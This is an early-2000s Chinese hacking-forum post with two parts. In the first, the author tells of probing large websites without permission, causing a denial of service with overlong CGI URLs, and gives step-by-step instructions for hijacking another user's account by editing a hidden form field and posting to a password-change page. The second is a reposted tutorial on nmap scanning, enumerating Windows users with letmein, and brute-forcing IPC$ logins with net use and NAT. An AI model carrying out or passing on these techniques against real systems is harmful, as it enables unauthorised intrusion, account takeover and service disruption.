论坛: 菜鸟乐园 标题: 最简单的入侵!(Evangelion) 复制本贴地址    
作者: Evangelion [evangelion]    论坛用户   登录
近来对系统漏洞,已经没什么兴趣了. 因为现在补丁出得很快.大型网站已经没什么系统问题了. 就算你使用twwwscan,namp等威力挺强的扫描器也不可能扫描出什么东东,有,也是欺骗的.但,所谓百密必有一疏.越大的网站需要的脚本也越多.而脚本是靠个人能力写出来的.能力不够,其安全一定存在问题.如果使用免费的脚本,那问题更是多多. 如果原代码容易得到.侵入起来太简单了.   

强烈建议:不要使用免费的脚本程序.用了也要注意修改安全上的问题.   

WEB脚本大致分为html,asp,cgi,php,jsp,xml,pl...等等.   
其中cgi的问题居多,它是比较早期的脚本程序.所以对它的研究也就相对较多.   
html则是最安全的.因为它功能最少,脚本也相对少.   

最近对一些大型网站(由于某些原因,略去域名)测试了一下.也发现了几个脚本上的问题(现已修复)    http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=10322   
将其修改    http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=***   
将会暴露绝对路径(可能为了方便调试用,很多站点都有这问题)   
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs   
/club/community/***.htm   
接下来    http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=//////////////////////////////   
///////   
长文件名试试^_^,哈...暴露内部IP了.   
Fail To Load HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community//////////////////////////////////////////   
//////////192.168.10.30.htm   
再来    http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id='ls'   
出现了SQL处理错误.可惜,没去测试怎利用.   
最后    http://bbs.xxxxxxx.com/cgi-bin/user_interface?Pgroup_id=/////////////////////////////   
/////////////////////////////////////////////////////////////////////////////   
超长文件名攻击(apache对长文件名url很容易出问题)   
Internal Server Error   
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@tencent.com and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.   
--------------------------------------------------------------------------------   
Apache/1.3.12 Server at bbs.xxxxxx.com Port 80   
:),拒绝服务了.估计只是xxx.xxx.xx.xx出问题:),   
拒绝服务后,上面方法测试都已经失效.其它服务正常.   
(当时还以为马上打了补丁呢^_^)   
这漏洞没什么用处,只是知道即使大型得网站也有BUG,呵呵^_^   

后来又对另外一家大型网站进行了测试:)   
http://training.yyyyyy.com/   
测试了几个认证漏洞.包括那1' or passwd 〈〉 '1   
都没成功:)后来注册了一个redh,登陆进去:)   
看来看去都没什么...   
接着选了修改[修改个人信息]   
进去一看,就发现问题了:)   
里面竟然可以直接修改密码,并且还有user cookie   
OK,既然发现了,当然是操作了:)   
打开原代码-〉搜索一下-〉post   
〈form method="post" name=form1 id=form1 action="Myschool/StudentUpdate1.asp"〉   
找到这行,对action修改一下   
〈form method="post" name=form1 id=form1 action="http://training.yyyyyy.com/Myschool/StudentUpdate1.asp"〉   
然后再找username   
〈tr〉〈td width="16%" class=bt align=right〉* 用户名:〈/td〉   
〈td width="32%" class=nr align=left〉redh〈/td〉//用户名:)   
改成sp.(你要改的用户名)   
然后保存成a.htm   
运行后,把密码设置成123(看你喜欢了)   
post过去...恩,跳到主页了..没成功..   
然后我又看了一下原代码..   
看了这个:   
〈input type=hidden name=Customer value="redh"〉   
:)原来cookie跑这了..   
OK,修改一下..   
〈input type=hidden name=Customer value="sp"〉   
再post,哈...成功了..   
登陆sp,123^_^进去了.看一下资料修改.跟修改时写得一样.   
---------------------------------------------   
  想说一下,一个大型网站只要有使用大量脚本程序.肯定存在XX问题的.这问题或许由于疏忽,也许由于写作功力不足引起的.只要你耐心的找.就会发现.当然对语言肯定也要熟悉的.你不可能说对CGI一点都不会,但去发现它的问题吧.对网站想说:   
1,少用免费的东东,便宜没好货.   
2,对安全问题一定要注意.小的疏忽就可能造成大的安全问题   

--------------------------------------------------------------------------   

黑客实用技术--基于IPC$的攻击   
2001-03-21・ abu・yesky   
一、nmapNT 的使用   

开始的时候我也纳闷,为什么很多人都喜欢用nmap,有那么多扫描工具,比如superscan portscanner 之类。后来才明白,nmap的强大(半开模式扫描、系统甄别、、)愿意仔细看看的朋友可以去安全焦点看quack烂人翻译的nmap使用说明。   

我用的是WIN2K,不过习惯性的更愿意在命令行下,eEye公司出了nmapNT版,自然不能放过:   

look:   

倒,没注意,图片这么大。   

上面的是第一步,安装协议,这个。。原因嘛。。   

这个软件需要WinPcap包,就是类似与libpcap的包,支持WIN32平台。可以进行信息包捕获和网络分析,是基于UNIX的libpcap和BPF(Berkeley 分帧过滤器)模型的包。   

它包括内核级的包过滤驱动程序,低级动态连接库(packet.dll),和高级系统无关性库(libpcap)。   

这个WinPcap信息包捕获启动程序可把设备驱动增加在Windows 95, Windows 98, Windows NT 和 Windows 2000 上,可以有能力捕获和发送通过原始套接口的信息包(raw packets),Packet.dll是一个能用来直接访问BPF驱动程序的API。   

WinPcap在http://netgroup-serv.polito.it/windump和http://netgroup-serv.polito.it/analyzer这两个工具中成功应用。   

最新的WinPcap支持了WIN2000。具体信息和源代码可以在下面这个站点找到http://netgroup-serv.polito.it/winpcap/   

等等。。。不多说了,找到了吧。。   
look:   

确定拉。。   

look,多了一个吧   

转到命令行,对了,还要重启。。比较麻烦。   

命令行运行,WK,I服了U!果然和UNIX的一样(起码看起来一样)   

-sS SYN 扫描端口   
look:   

标准的WINDOWS NT服务器。   

今天说IPC$,别的就不说了。。   

二、letmein 的使用   

获取对方用户列表 letmein -all -d 参数(display嘛)   

16个用户,OK,开始尝试简单密码?OK,-g参数(guess?反正就是简单猜测拉)   

那,这是过程,不过注意最下面。。。   

是的,发现Guest用户,密码是空的。   

看admin组有那些用户   

看清楚了么?   

反正实质内容没多少,过程倒是拍了好多照片哦,呵呵   

上面说的就是使用letmein 探测对方用户列表以及了解更多信息   

OK   

开始破解密码,当然,是通过IPC$方式。。   

    

三、NAT破解密码   

啊呀,说了老半天,IPC$没说。   

IPC$共享不是一个目录,磁盘或打印机意义上的共享。你看到的"$",它是默认的在系统启动时的admin共享。IPC是指"InterProcess Communications"。   

IPC$共享提供了登录到系统的能力。注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。   

使用NT自带的命令就可以对IPC$实施攻击:   

c:>net use \\[目标机器的IP地址]\ipc$ /user:   

当这个连接建立后,要将username和password送去加以确认。如果你把name设为某一用户,不断变换passwd就起到了破解的作用   

c:>net use \\206.204.38.210\ipc$ /user:   

破解这个密码,可以用的工具很多,比如常见的小榕软件的流光拉,NAT拉,ipccrack拉   

该他这个用户倒霉,我来跑techserv这个用户的密码,不过。。习惯性喜欢用命令行的。。   

NAT   

NAT这个软件很老很老了。。不知道还有没有人用。。不过我还是喜欢。仔细看上面。我做了一个USERLIST用户列表 和PASSLIST密码档(字典拉)然后开始了,然后是一堆废话(细心的人可以看见很多东西)需要注意的就只有。。   


--- CONNECTED: Username: `techserv` Password: `1234`   

看见了吧,密码出来了(呵呵,当然这是被我改过的,啊呀,写教材呀,又不是要如何如何现实生活中,很大一种可能是跑好久也跑不出来。。)   

再仔细看看。。   

知道了密码还不连上去?。。   

net use连拉  


地主 发表时间: 11/04 22:27

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号